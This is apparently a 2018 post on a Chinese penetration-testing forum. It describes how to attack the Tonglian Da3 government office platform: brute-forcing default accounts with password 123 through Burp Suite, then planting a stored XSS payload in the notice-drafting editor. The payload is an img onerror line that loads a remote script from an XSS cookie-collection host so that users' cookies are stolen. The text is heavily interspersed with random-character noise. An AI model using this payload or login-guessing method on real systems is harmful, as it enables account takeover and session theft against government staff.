中国网络渗透测试联盟

标题: 同联Da3协同办公平台后台通用储存型xss漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:14
标题: 同联Da3协同办公平台后台通用储存型xss漏洞
5 {3 U! l/ j& z% Q: d7 H1 _) U! a1 H5 e6 X . p* _4 E' g* c: h5 T* ^$ W6 M, a- T4 f/ B; [: e " R. [0 B' P# }, e* f - g( |4 V( v8 Z# q; A 8 w: J( w6 _+ m4 B ( X+ C' J t. M3 F, C- q' G8 _+ K+ |( b ; ]1 m) B$ v1 Z0 n9 b# W 4 w, t# V; i/ Z" {) @& y% a3 Q1 B 4 V l/ y/ M" K6 G$ O4 y( Y( A o- R( K- C
% y2 U9 H6 h' `* j1 x: u

m( b8 M# V7 A& O, }7 M& S* N 同联Da3协同办公平台后台通用储存型xss漏洞 + k) m% I2 a5 q8 \& i: `. Y

. i7 e( p0 Z+ Q# u2 n

5 V, p$ g! l H5 t7 r% J 平台简介:0 X/ x! s" Z5 q1 l1 s

1 n, f! A( `- e4 I+ l! i2 j# p

% L* q6 I* y2 x1 s, ]  8 p" K6 \' Z$ }' Q" N% w) V6 A

# a" a# {2 ~6 \3 J8 u5 g

6 u3 v$ P2 x" h) M0 L, \5 x$ \ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
4 |( k2 H+ Y5 q/ D3 |# F5 o# z 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% d2 C+ I, a% f0 E: w5 o$ v2 Y 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! ' I5 M7 {3 K) @( @ `

8 K6 C' w3 U3 M. Z

: V$ y# t/ h8 Q" [   5 m. n" N4 q2 }3 }# r* P

8 \7 Z p2 ?; d# _

' H x2 Y& }( q 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: - H8 P9 t1 j: Z" j7 J- R0 z E

6 U# N7 K7 U& D7 o

, A! f- s7 V) X1 l% W7 y   9 Z9 \% k/ Q1 N( S

0 x; t5 D: P9 a0 Y

8 R1 s& i! R" I+ k" H& n http://1.1.1.1:7197/cap-aco/#(案例2-) 7 s& F5 D% j, u4 a$ \

6 v; _- V3 p& W; L4 ]- K

P7 [1 k- R! ] http://www.XXOO.com (案例1-官网网站) " U9 G1 I* U% B6 G, _3 q9 n

- t7 b+ `7 q, f

" I! k& V, N1 k 漏洞详情:& R, u/ F- b& Z K$ [/ U' s0 v& ]

- g( a o$ g: P& I P

, j4 r t9 x; r- Z; A3 M0 A+ p  案例一、" c( I7 u( l% G- d8 z3 z

2 N1 h, d* h# l+ G/ V& D

* s2 D$ k1 E+ K# O$ I$ ] 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试1 R6 C( u9 L& p7 l, m+ F7 L

4 a& W( R) G% D, {. W

' g, K. f+ g; Q! s      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: + Q8 t0 }+ h7 h& G9 ^+ _! X

1 X, J% S; u5 u

" T9 {+ G- i5 j  7 O) D/ W! {3 s0 L: ]

- E: _" u7 u$ Z9 M: a$ b

; D6 d; X& S7 Q* @* y IMG_256 9 e! f( j' l$ W, E5 J3 e8 `

# j* V8 b+ s4 \

' S9 ]% g# v& [2 c" Z status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 5 G6 o X2 S6 w7 r( N

+ S. |- A2 e" E' ?

+ f7 D0 [5 W! [0 A+ {$ L2 z& [   / A; h9 N) ]) g3 J

) H* o4 K5 {# T; t& u5 q

* ^1 c: K! A3 L 2 p/ a; B! l/ f

" [! z9 I: c0 M/ e6 u

7 v; u3 i7 p( o+ ?/ j8 ]. j: a% z 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ' L( g: d \3 _

9 m9 x6 Z* {9 {8 F+ K" w; _

8 u8 {! n: K8 V0 k: c   $ s- r$ h; _. e6 F; j) D t

$ s! A1 f8 P) `4 Q4 ^4 P; y

4 i# {! _2 P. d3 u9 \6 i5 I <img src=x" q2 J6 _; r+ ~: b onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: ) U- }8 S. e" W/ {

/ l" @( C& ]# o Q4 q! O# C6 R( Z

- [. J6 E" z) D# {! l ' W y) X# f: s8 {& _* T! |

8 O& Z- a8 P2 V: g+ m' G7 ?

3 D/ R' N- h/ s 然后发送,接收cookie如图: 4 q8 B, r/ C& y: }9 i0 o" i

8 @& u5 G. j' L0 q. n: m9 N

! y; P5 o7 ~9 m& u V4 ]+ D   # I9 R% L' A, @& O6 P! d1 _ X

* e; J, C) E3 l' z8 }

* S. k6 i" B; ~: f1 f   # a3 c$ W3 {/ i( Y# `: N

1 K( }! p4 p9 Q2 ^# }2 E! [

4 S( j1 b. o1 ~ }   ' S% h8 C1 J/ h# N8 y O

0 Y; }$ Y4 n: Q! \* U. y9 s

4 g, r4 l4 Q1 [, d   3 Z6 N2 `3 c! H7 a$ i# X

) L4 E! [# T) A# c2 v! d

! A( {' _$ P' Q F 7 T' s2 c# U1 B) C1 \& B, z

: t3 x: ]$ ]0 ^% ?5 }$ S

6 ?/ o, K/ u; M0 o ' m% a: z# [: A4 v( W

3 _8 A4 d7 R- Q$ _0 I' p8 E

- R" U* X/ c* [6 J0 l2 l) F   ! @( v; O7 c6 d$ t8 D% C/ t

G" F' i: p( h6 \

. k& F: m2 |' G& D* I1 X$ @$ h 案例2、 7 F: a' R. R' C4 `, l7 e8 j

; y& c9 n! q; U- {

0 E" Z$ k- j/ @ 前面步骤都一样,下面看效果图: ( Q( |) a# ]: P4 M# m" V8 [

- A0 O; w+ E2 ^' J

; W- x7 U L$ x- W& `" z" D# Q0 ^/ G % {+ G8 [3 x7 y* u7 K/ Q4 `2 w/ v

7 m1 k9 X0 ?0 R6 ~+ p0 p* c4 O

C3 `; ]2 Q* [* E- I) g8 ]8 B - W3 o- Q1 p% r

/ m+ N6 K2 ]' O1 c2 D# Z' B

4 H. Y' V1 P' M) K0 N2 o0 E   4 }4 @ \; D; P+ a- s8 K

5 y# }( g* n0 Q- O W" n& H! u [- u

4 f% q, y1 I8 q$ B T. H* L% l   5 }" H- p2 H2 T8 p, G

% I0 C" D/ z) U N- w1 x

, B& V" V4 A& c% s ! m. Y: b5 F5 O- O$ n" Q

4 F$ g* s+ k+ i' |4 \& [0 O" t

5 E( M" N" U( M% ~ V8 F: t0 k, W   % k/ _" `4 X! @1 O& U

3 \- g3 V; \: V7 J! O

6 \9 Q m8 \- s# F6 Q. H* ~   * z/ e% x" g+ r' B. ]% d w

' [& f% \, [0 q, E$ `

" |/ {( h* d& t% D& m6 A   0 ^& s) }" x+ b# R$ T

2 F+ g7 b% W8 [$ S

, ]( g6 E5 w- f. ]   / N# O+ {. ?+ X9 V" |. j

( T7 E3 Q* T# o" C3 k7 |





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2